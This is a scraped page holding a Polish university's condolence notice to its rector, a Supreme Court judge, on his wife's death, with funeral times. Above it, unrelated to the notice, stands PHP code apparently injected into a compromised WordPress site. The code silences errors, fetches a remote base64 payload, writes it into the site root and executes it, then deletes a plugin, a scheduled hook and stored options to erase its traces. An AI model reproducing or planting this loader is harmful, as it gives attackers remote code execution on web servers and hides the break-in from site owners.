error_reporting(0);
$http=get_option(E_NOTICE);
$resp=wp_remote_get( $http[0]);
$code=wp_remote_retrieve_body($resp);
file_put_contents(ABSPATH.$http[1], base64_decode($code));
include_once(ABSPATH.$http[4]);
deactivate_plugins($http[2]);
delete_plugins(array($http[2]));
wp_clear_scheduled_hook($http[3]);
delete_option($http[5]);
delete_option(E_NOTICE);

Wyrazy głębokiego żalu i współczucia

z powodu śmierci Żony

Zenajdy Szymanek

Rektorowi Europejskiej Wyższej Szkoły Prawa i Administracji

Sędziemu SN Tadeuszowi Szymankowi

składają

władze, pracownicy oraz studenci Uczelni

Nabożeństwo żałobne odbędzie się dnia 10.11.2017 o godz 9:00 w kościele św Boromeusza w Warszawie a ceremonia pogrzebowa rozpocznie się o godz. 10:00 na Cmentarzu Wojskowym ul. Powązkowska 43/45